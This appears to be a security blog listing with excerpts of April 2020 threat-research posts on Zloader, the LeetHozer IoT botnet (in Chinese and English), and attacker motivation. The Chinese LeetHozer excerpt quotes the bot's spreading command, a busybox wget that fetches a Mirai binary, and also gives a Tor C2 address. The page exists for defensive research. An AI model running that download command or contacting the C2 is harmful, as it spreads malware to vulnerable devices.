April 26, 2020

The DGA of Zloader

Zloader — also known as Terdot, DELoader or Zeus Sphinx 1 — is a malware from May 2016 that has resurged in the last few weeks […]
April 27, 2020

LeetHozer Botnet分析报告

背景 2020年3月26日我们捕获了一个可疑的样本 11c1be44041a8e8ba05be9df336f9231,大部分杀毒引擎将其识别为Mirai,但是其网络流量却不符合Mirai的特征,这引起了注意,经分析,这是一个复用了Mirai的Reporter,Loader机制,重新设计了加密方法以及C2通信协议的Bot程序。 Mirai已经是安全社区非常熟悉的老朋友,蜜罐系统每天都能捕获大量的Mirai变种,这些变种都非常简单:要么是换一换C2;要么改一改加密的Key;要么集成些新的漏洞扫描……这些入门级的DDoser已经不能引起我们的任何兴趣了。这个Bot程序之所以能在众多变种脱颖而出,一是因为它独特的的加密方法,严谨的通信协议;二是因为在溯源过程中,我们发现它很有可能隶属于Moobot团伙而且正在迭代开发中(就在我们编写本文的同时作者更新了第三个版本,增加了一些新功能,更换了新的Tor CC vbrxmrhrjnnouvjf.onion:31337)。基于这些原因,我们决定将它曝光。因为传播过程中使用H0z3r字串(/bin/busybox wget http://37[.49.226.171:80/bins/mirai.m68k -O - > H0z3r;),我们将其命名为LeetHozer。目前观测到感染目标主要是雄迈旗下的固件版本早于2017年5月的H.264设备和部分固件版本晚于2017年5月H.265设备。其Bot功能主要包括: 漏洞扫描,入侵并上报新设备 DDos攻击 传播 LeetHozer利用目标设备TCP 9530端口的漏洞(后门)开启的telnetd服务,开启成功后通过默认口令登录设备完成感染过程。传播过程如图所示: 关于9530端口漏洞的利用 2017 年安全研究人员披露了该漏洞[1]。[2]。 2020-02-04 漏洞POC在github上开源[3]。[4]。 2020-02-11 我们首次看到我们称之为moobot_xor的moobot变种利用该漏洞 2020-03-26 LeetHozer开始利用该漏洞。 […]
April 27, 2020

The LeetHozer botnet

Background On March 26, 2020, we captured a suspicious sample11c1be44041a8e8ba05be9df336f9231. Although the samples have the word mirai in their names and most antivirus engines identified it […]
April 27, 2020

The Duality of Attackers – Or Why Bad Guys are a Good Thing™

The Duality of Attackers – Or Why Bad Guys are a Good Thing™ It’s no secret I’ve been on a spiritual journey the last few years. […]